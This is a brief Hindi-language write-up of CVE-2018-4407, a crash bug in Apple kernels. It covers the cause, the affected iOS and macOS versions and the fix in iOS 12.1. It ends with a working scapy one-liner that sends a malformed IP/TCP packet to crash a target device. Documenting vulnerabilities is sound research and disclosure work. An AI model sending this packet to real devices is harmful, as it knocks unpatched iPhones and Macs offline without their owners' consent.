
CVE-2018-4407 अवलोकन और कार्यान्वयन
सिद्धांत यह है कि "icmp" पैकेट के अन्य फ़ील्ड्स को अवैध बना दिया जाता है, जिससे macOS या iPhone कर्नेल द्वारा पार्स करते समय आकार की जाँच न होने के कारण क्रैश हो जाता है।
Apple iOS 11 और पुराने संस्करण: सभी उपकरण
Apple macOS High Sierra (प्रभावित उच्चतम संस्करण 10.13.6): सभी उपकरण
Apple macOS Sierra (प्रभावित उच्चतम संस्करण 10.12.6): सभी उपकरण
Apple OS X El Capitan और पुराने संस्करण: सभी उपकरण
Apple ने 30 अक्टूबर को जारी "iOS 12.1" अपडेट पैकेज में इस भेद्यता को पूरी तरह से ठीक कर दिया।
pip install scapy
sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))